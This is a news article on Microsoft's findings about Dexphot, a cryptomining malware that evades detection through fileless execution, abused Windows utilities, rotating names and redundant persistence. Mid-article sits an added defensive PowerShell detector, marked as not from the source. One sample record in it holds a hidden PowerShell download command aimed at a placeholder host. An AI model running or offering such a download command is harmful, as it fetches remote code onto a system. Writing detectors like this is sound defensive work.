Microsoft says new Dexphot malware infected more than 80,000 computers

by technewshero
November 26, 2019
in Security
[Image: dexphot-stats.png (Image: Microsoft)]

Microsoft security engineers detailed today a new malware strain that has been infecting Windows computers since October 2018 to hijack their resources to mine cryptocurrency and generate revenue for the attackers.

Named Dexphot, this malware reached its peak in mid-June this year, when its botnet reached almost 80,000 infected computers.

Since then, the number of daily infections has been slowly going down, as Microsoft claims it deployed countermeasures to improve detections and stop attacks.

A complex malware strain for a mundane task

But while Dexphot’s end goal was banal, the methods and techniques behind its modus operandi stood out for their high level of complexity, something that Microsoft also noted.

“Dexphot is not the type of attack that generates mainstream media attention,” said Hazel Kim, a malware analyst for the Microsoft Defender ATP Research Team, referring to the malware’s mundane task of mining cryptocurrency, rather than stealing user data.

“It’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles – to install a coin miner that silently steals computer resources and generates revenue for the attackers,” Kim said.

“Yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.”

In a report shared with ZDNet that’s scheduled to go live later today, Kim details Dexphot’s advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms.

Infection process

According to Microsoft, Dexphot is what security researchers call a second-stage payload — a type of malware that’s dropped on systems that are already infected by other malware.

In this case, Dexphot was being dropped on computers that were previously infected with ICLoader, a malware strain that’s usually side-installed as part of software bundles, without the user’s knowledge, or when users downloaded and installed cracked or pirated software.

On some of these ICLoader-infected systems, the ICLoader gang would download and run the Dexphot installer.

Microsoft says this installer would be the only part of the Dexphot malware that would be written to disk, but only for a short period of time. Every other Dexphot file or operation would use a technique known as fileless execution to run inside the computer’s memory only, making the malware’s presence on a system invisible to classic signature-based antivirus solutions.

Furthermore, Dexphot would also employ a technique called “living off the land” (or LOLbins) to (ab)use legitimate Windows processes to execute malicious code, rather than run its own executables and processes.

For example, Microsoft says Dexphot would regularly abuse msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe, all legitimate apps that come pre-installed on Windows systems. By using these processes to start and run malicious code, Dexphot effectively became indistinguishable from other local apps that were also using these Windows utilities to do their jobs.

[Image: dexphot-modus-operandi.png (Image: Microsoft)]

But Dexphot’s operators didn’t stop there. Because antivirus products have in recent years used cloud-based systems to inventory and centralize patterns of malicious fileless execution and LOLBin abuse, Dexphot also employed a technique called polymorphism.

This technique refers to malware that constantly changes its artifacts. According to Microsoft, Dexphot operators changed the file names and URLs used in the infection process once every 20-30 minutes.

By the time an antivirus vendor would detect a pattern in Dexphot’s infection chain, that pattern would change, and allow the Dexphot gang to stay a step ahead of cyber-security products.

Multi-layered persistence mechanisms

But no malware stays undetected forever, and even in these cases, the Dexphot gang had planned ahead.

Microsoft says that Dexphot came with clever persistence mechanisms that would often re-infect systems that were not cleaned of all of the malware’s artifacts.

First, the malware used a technique called process hollowing to start two legitimate processes (svchost.exe and nslookup.exe), hollow out their contents, and run malicious code from within them.

Disguised as legitimate Windows processes, these two Dexphot components would monitor that all of the malware’s components were up and running, and reinstall the malware if any of them was stopped. Because there were two such “monitoring” processes, even if system administrators or antivirus software removed one, the second would serve as a backup and re-infect the system later on.

Second, also working as a failsafe, Dexphot used a series of scheduled tasks to make sure the victim was filelessly reinfected after every reboot, or once every 90 or 110 minutes.

Because the tasks were scheduled to run at regular intervals, they also served as a way for the Dexphot gang to deliver updates to all infected systems.

According to Microsoft, every time one of these tasks ran, it downloaded a file from an attacker-controlled server. This allowed the attackers to modify that file with updated instructions for all Dexphot-infected hosts and update their entire botnet within hours of an antivirus vendor deploying any countermeasures.

Further, Microsoft says that polymorphism was also used for these tasks, with the Dexphot gang changing task names at regular intervals. This simple trick allowed the malware to skirt any blocklists that blocked scheduled tasks by their names.
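As an added defender’s example, not code from the article or from Microsoft’s report: a PowerShell check that triages scheduled tasks by what they execute and how often they repeat, rather than by task name, since the article notes that Dexphot rotated task names to skirt name-based blocklists and ran its tasks through the LOLBins listed above. The LOLBin list and the 90/110-minute intervals come from the article; the sample task records, the placeholder URL, and the Test-SuspiciousTask function name are constructed for this example.

```powershell
# Added example: flag scheduled tasks by their actions and repetition interval,
# not by name, because Dexphot rotated task names at regular intervals.
# LOLBins named in the article as abused by Dexphot.
$LolBins = @('msiexec.exe', 'unzip.exe', 'rundll32.exe', 'schtasks.exe', 'powershell.exe')
# Argument fragments that indicate a task is fetching something from the network,
# which a benign local maintenance task rarely needs.
$DownloadPatterns = @('http://', 'https://', 'DownloadString', 'DownloadFile', 'Net.WebClient')

function Test-SuspiciousTask {
    # Accepts objects shaped like Get-ScheduledTask output (TaskName, Actions, Triggers).
    param([Parameter(Mandatory)] $Task)
    $reasons = @()
    foreach ($action in $Task.Actions) {
        $exe = [System.IO.Path]::GetFileName((([string]$action.Execute) -replace '"', '')).ToLower()
        if ($LolBins -contains $exe) {
            $argString = [string]$action.Arguments
            foreach ($pattern in $DownloadPatterns) {
                if ($argString -match [regex]::Escape($pattern)) {
                    $reasons += "LOLBin $exe with download-style argument '$pattern'"
                    break
                }
            }
        }
    }
    foreach ($trigger in $Task.Triggers) {
        # Get-ScheduledTask reports repetition as an ISO 8601 duration, e.g. PT90M.
        $interval = [string]$trigger.Repetition.Interval
        if ($interval -in @('PT90M', 'PT1H30M', 'PT110M', 'PT1H50M')) {
            $reasons += "repetition interval $interval matches the 90/110-minute cadence"
        }
    }
    [PSCustomObject]@{ TaskName = $Task.TaskName; Suspicious = ($reasons.Count -gt 0); Reasons = $reasons }
}

# Constructed sample records (offline stand-ins for Get-ScheduledTask objects).
$SampleTasks = @(
    [PSCustomObject]@{
        TaskName = 'Office Update Task 4f9a'   # rotated name: a name blocklist would miss it
        Actions  = @([PSCustomObject]@{ Execute = 'powershell.exe'; Arguments = '-w hidden -c "(New-Object Net.WebClient).DownloadString(''http://placeholder.invalid/u'')"' })
        Triggers = @([PSCustomObject]@{ Repetition = [PSCustomObject]@{ Interval = 'PT90M' } })
    },
    [PSCustomObject]@{
        TaskName = 'Defrag Weekly'
        Actions  = @([PSCustomObject]@{ Execute = '%windir%\system32\defrag.exe'; Arguments = '-c -h' })
        Triggers = @([PSCustomObject]@{ Repetition = [PSCustomObject]@{ Interval = '' } })
    }
)

$SampleTasks | ForEach-Object { Test-SuspiciousTask $_ } | Format-Table -AutoSize
# On a live host: Get-ScheduledTask | ForEach-Object { Test-SuspiciousTask $_ } | Where-Object Suspicious
```

The first sample record is flagged on both its action and its interval while the defrag task passes, which is the point: a task renamed every few minutes still has to run the same LOLBin with the same arguments on the same cadence.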

As Microsoft’s Kim pointed out above, all of these techniques are terribly complicated. One would normally expect these types of redundancies to be found in the infection chains for malware developed by advanced government-backed hacking units.

However, in the last two years, these techniques have been slowly trickling down to cyber-criminal gangs, and are now pretty much a common occurrence in something as mundane as a crypto-currency mining operation like Dexphot, infostealers like Astaroth, or click-fraud operations like Nodersok.
